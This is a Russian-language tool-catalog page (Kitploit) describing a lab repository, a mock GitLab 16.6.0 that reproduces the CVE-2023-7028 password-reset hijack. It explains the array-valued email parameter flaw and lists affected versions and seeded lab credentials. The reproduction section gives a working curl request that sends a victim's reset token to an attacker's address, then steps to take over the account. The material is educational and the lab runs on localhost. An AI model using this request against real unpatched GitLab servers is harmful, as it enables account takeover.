Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
GitLab-CVE-2023-7028 — Уязвимый экземпляр GitLab для лабораторных работ, воспроизводящий перехват сброса пароля CVE-2023-7028. Демонстрирует эксплуатацию параметра электронной почты на основе массива и захват учётной записи. Только для учебных лабораторных целей. | Kitploit
Инструменты/GitHubGitHub/feartheploto/gitlab-cve-2023-7028
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийОбучение и ОбразованиеЛаборатории и Практика
GitHubfeartheploto/gitlab-cve-2023-7028

GitLab-CVE-2023-7028

Уязвимый экземпляр GitLab для лабораторных работ, воспроизводящий перехват сброса пароля CVE-2023-7028. Демонстрирует эксплуатацию параметра электронной почты на основе массива и захват учётной записи. Только для учебных лабораторных целей.

Репозиторий
16 ч 36 мин назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

GitLab CVE-2023-7028 — Mock 16.6.0 (только хост)

CVE-2023-7028 (CVSS 10.0): POST /users/password принимал массив user[email][] — сервер находил пользователя по email[0], но отправлял один и тот же токен сброса на каждый адрес → атакующий с [email protected] перехватывает [email protected]. Затронуты: GitLab CE/EE <16.5.6, <16.6.4, <16.7.2. Этот mock воспроизводит уязвимый поток версии 16.6.0 (JSON-БД, без SMTP).

Запуск

npm install && npm start → http://127.0.0.1:3000 (или PORT=3001 npm start; автоматические повторы при занятости; только localhost). Предустановленные учётные записи: [email protected]/s3cur3P@ss!, , в .

[email protected]/BobSecure1!
[email protected]/5iveL!fe
data/users.json

Воспроизведение

curl -X POST http://127.0.0.1:3000/users/password -d "user[email][][email protected]&user[email][][email protected]" Проверьте http://127.0.0.1:3000/mailbox или /api/emails — оба получают один и тот же токен. Откройте .../users/password/edit?reset_password_token=TOKEN, чтобы перехватить учётную запись. Обычный сценарий: user[email][email protected] → одно письмо. Mailbox показывает все письма; ничего не покидает хост. MIT — только для лаборатории, не выставляйте наружу.

Скачать инструмент